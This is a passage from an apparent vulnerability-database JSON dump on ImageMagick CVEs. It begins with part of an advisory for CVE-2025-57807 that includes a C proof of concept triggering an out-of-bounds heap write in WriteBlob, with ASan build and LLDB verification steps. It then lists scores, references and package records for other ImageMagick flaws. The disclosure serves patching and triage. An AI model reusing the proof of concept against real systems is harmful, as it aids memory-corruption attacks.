\\\n --without-x --without-lqr --without-gslib\n\nmake -j\"$(sysctl -n hw.ncpu)\"\nmake install\n\n\"$HOME/opt/im-7.1.2-0/bin/magick\" -version > magick_version.txt\n```\n\n---\n\n## Build & Run the PoC (memory-backed BlobStream)\n\n**`poc.c`:** \n_Uses private headers (`blob-private.h`) to exercise blob internals; a public-API variant (custom streams) is feasible but unnecessary for triage._\n\n```c\n// poc.c\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <MagickCore/MagickCore.h>\n\n#include <MagickCore/blob.h>\n\n#include \"MagickCore/blob-private.h\"\n\n \n\nint main(int argc, char **argv) {\n\nMagickCoreGenesis(argv[0], MagickTrue);\n\nExceptionInfo *e = AcquireExceptionInfo();\n\nImageInfo *ii = AcquireImageInfo();\n\nImage *im = AcquireImage(ii, e);\n\nif (!im) return 1;\n\n \n\n// 1-byte memory blob → BlobStream\n\nunsigned char *buf = (unsigned char*) malloc(1);\n\nbuf[0] = 0x41;\n\nAttachBlob(im->blob, buf, 1); // type=BlobStream, extent=1, offset=0\n\nSetBlobExempt(im, MagickTrue); // don't free our malloc'd buf\n\n \n\n// Step 1: write 1 byte (creates BlobInfo + sets offset=1)\n\nunsigned char A = 0x42;\n\n(void) WriteBlob(im, 1, &A);\n\nfprintf(stderr, \"[+] after 1 byte: off=%lld len=%zu\\n\",\n\n(long long) TellBlob(im), (size_t) GetBlobSize(im));\n\n \n\n// Step 2: seek way past end without growing capacity\n\nconst MagickOffsetType big = (MagickOffsetType) 0x10000000; // 256 MiB\n\n(void) SeekBlob(im, big, SEEK_SET);\n\nfprintf(stderr, \"[+] after seek: off=%lld len=%zu\\n\",\n\n(long long) TellBlob(im), (size_t) GetBlobSize(im));\n\n \n\n// Step 3: small write → reallocation grows by quantum+length, not to offset+length\n\n// memcpy then writes to data + offset (OOB)\n\nconst unsigned char payload[] = \"PWN\";\n\n(void) WriteBlob(im, sizeof(payload), payload);\n\n \n\n// If we get here, it didn't crash\n\nfprintf(stderr, \"[-] no crash; check ASan flags.\\n\");\n\n \n\n(void) CloseBlob(im);\n\nDestroyImage(im); DestroyImageInfo(ii); DestroyExceptionInfo(e);\n\nMagickCoreTerminus();\n\nreturn 0;\n\n}\n```\n\n---\n\n`run:`\n\n```bash\n# Use the private prefix for pkg-config\nexport PKG_CONFIG_PATH=\"$HOME/opt/im-7.1.2-0/lib/pkgconfig:$PKG_CONFIG_PATH\"\n\n# Strict ASan for crisp failure\nexport ASAN_OPTIONS='halt_on_error=1:abort_on_error=1:detect_leaks=0:fast_unwind_on_malloc=0'\n\n# Compile (static link pulls transitive deps via --static)\nclang -std=c11 -g -O1 -fno-omit-frame-pointer -fsanitize=address -o poc poc.c \\\n $(pkg-config --cflags MagickCore-7.Q16HDRI) \\\n $(pkg-config --static --libs MagickCore-7.Q16HDRI)\n\n# Execute and capture\n./poc 2>&1 | tee asan.log\n```\n\n**Expected markers prior to the fault:**\n\n```\n[+] after 1 byte: off=1 len=1\n[+] after seek: off=268435456 len=1\n```\n\nAn ASan **WRITE** crash in [`WriteBlob`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938) follows (top frames: `WriteBlob blob.c:<line>`, then `_platform_memmove` / `__sanitizer_internal_memmove`).\n\n---\n\n## Debugger Verification (manual)\n\nLLDB can be used to snapshot the invariants; ASan alone is sufficient.\n\n```\nlldb ./poc\n(lldb) settings set use-color false\n(lldb) break set -n WriteBlob\n(lldb) run\n\n# First stop (prime write)\n(lldb) frame var length\n(lldb) frame var image->blob->type image->blob->offset image->blob->length image->blob->extent image->blob->quantum image->blob->mapped\n(lldb) continue\n\n# Second stop (post-seek write)\n(lldb) frame var length\n(lldb) frame var image->blob->type image->blob->offset image->blob->length image->blob->extent image->blob->quantum image->blob->mapped\n(lldb) expr -- (unsigned long long)image->blob->offset + (unsigned long long)length\n(lldb) expr -- (void*)((unsigned char*)image->blob->data + (size_t)image->blob->offset)\n\n# Into the fault; if inside memmove (no locals):\n(lldb) bt\n(lldb) frame select 1\n(lldb) frame var image->blob->offset image->blob->length image->blob->extent image->blob->quantum\n```\n\n**Expected at second stop:** \n`type = BlobStream` · `offset ≈ 0x10000000` (256 MiB) · `length ≈ 3–4` · `extent ≈ 64 KiB` (≪ `offset + length`) · `quantum ≈ 128 KiB` · `mapped = MagickFalse` · `data + offset` far beyond base; next `continue` crashes in `_platform_memmove`.\n \n---\n\n## Credits\n\n**Reported by:** Lumina Mescuwa\n\n---", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-57807.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-57807.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-57807", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00047", "scoring_system": "epss", "scoring_elements": "0.1457", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00047", "scoring_system": "epss", "scoring_elements": "0.14541", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00047", "scoring_system": "epss", "scoring_elements": "0.14476", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00047", "scoring_system": "epss", "scoring_elements": "0.14472", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00047", "scoring_system": "epss", "scoring_elements": "0.1458", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00047", "scoring_system": "epss", "scoring_elements": "0.14635", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00047", "scoring_system": "epss", "scoring_elements": "0.14674", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00047", "scoring_system": "epss", "scoring_elements": "0.14714", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00047", "scoring_system": "epss", "scoring_elements": "0.14757", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00047", "scoring_system": "epss", "scoring_elements": "0.14684", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00047", "scoring_system": "epss", "scoring_elements": "0.14655", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00047", "scoring_system": "epss", "scoring_elements": "0.14565", "published_at": "2026-04-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-57807" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-57807", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-57807" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/077a417a19a5ea8c85559b602754a5b928eef23e", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-09-08T13:58:41Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/077a417a19a5ea8c85559b602754a5b928eef23e" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-23hg-53q6-hqfg", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-09-08T13:58:41Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-23hg-53q6-hqfg" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57807", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57807" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1114520", "reference_id": "1114520", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1114520" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2393590", "reference_id": "2393590", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2393590" }, { "reference_url": "https://github.com/advisories/GHSA-23hg-53q6-hqfg", "reference_id": "GHSA-23hg-53q6-hqfg", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-23hg-53q6-hqfg" }, { "reference_url": "https://usn.ubuntu.com/7756-1/", "reference_id": "USN-7756-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7756-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2025-57807", "GHSA-23hg-53q6-hqfg" ], "risk_score": 1.9, "exploitability": "0.5", "weighted_severity": "3.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mxg1-261s-nbds" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/24705?format=api", "vulnerability_id": "VCID-n47w-r932-abey", "summary": "ImageMagick is vulnerable to Heap Overflow when writing extremely large image profile in the PNG encoder\nAn extremely large image profile could result in a heap overflow when encoding a PNG image.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30883.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30883.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30883", "reference_id": "", "reference_type": "", "scores": [ { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00676", "published_at": "2026-04-24T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00447", "published_at": "2026-04-02T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00446", "published_at": "2026-04-04T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00439", "published_at": "2026-04-07T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00435", "published_at": "2026-04-08T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00437", "published_at": "2026-04-09T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00642", "published_at": "2026-04-11T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00637", "published_at": "2026-04-12T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00638", "published_at": "2026-04-13T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00631", "published_at": "2026-04-16T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00636", "published_at": "2026-04-18T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30883" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-30883", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-30883" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-qmw5-2p58-xvrc", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T14:53:57Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-qmw5-2p58-xvrc" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30883", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30883" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445878", "reference_id": "2445878", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445878" }, { "reference_url": "https://github.com/advisories/GHSA-qmw5-2p58-xvrc", "reference_id": "GHSA-qmw5-2p58-xvrc", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qmw5-2p58-xvrc" }, { "reference_url": "https://usn.ubuntu.com/8127-1/", "reference_id": "USN-8127-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8127-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" } ], "aliases": [ "CVE-2026-30883", "GHSA-qmw5-2p58-xvrc" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-n47w-r932-abey" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/64959?format=api", "vulnerability_id": "VCID-nvp5-dpj6-byda", "summary": "ImageMagick: ImageMagick: Arbitrary code execution via a crafted XBM image file", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23876.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23876.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-23876", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25301", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25062", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25249", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25208", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25154", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25164", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25153", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25343", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25121", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.2519", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25235", "published_at": "2026-04-09T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-23876" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23876", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23876" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126076", "reference_id": "1126076", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126076" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431038", "reference_id": "2431038", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431038" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/2fae24192b78fdfdd27d766fd21d90aeac6ea8b8", "reference_id": "2fae24192b78fdfdd27d766fd21d90aeac6ea8b8", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-01-21T04:55:22Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/2fae24192b78fdfdd27d766fd21d90aeac6ea8b8" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-r49w-jqq3-3gx8", "reference_id": "GHSA-r49w-jqq3-3gx8", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-01-21T04:55:22Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-r49w-jqq3-3gx8" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3058", "reference_id": "RHSA-2026:3058", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3058" }, { "reference_url": "https://usn.ubuntu.com/8021-1/", "reference_id": "USN-8021-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8021-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-23876" ], "risk_score": 3.6, "exploitability": "0.5", "weighted_severity": "7.3", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nvp5-dpj6-byda" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/21884?format=api", "vulnerability_id": "VCID-p5aw-n691-nkff", "summary": "ImageMagick: MSL image stack index may fail to refresh, leading to leaked images\nSometimes msl.c fails to update the stack index, so an image is stored in the wrong slot and never freed on error, causing leaks.\n\n```\n==841485==ERROR: LeakSanitizer: detected memory leaks\n\nDirect leak of 13512 byte(s) in 1 object(s) allocated from:\n #0 0x7ff330759887 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25988.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25988.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25988", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00024", "scoring_system": "epss", 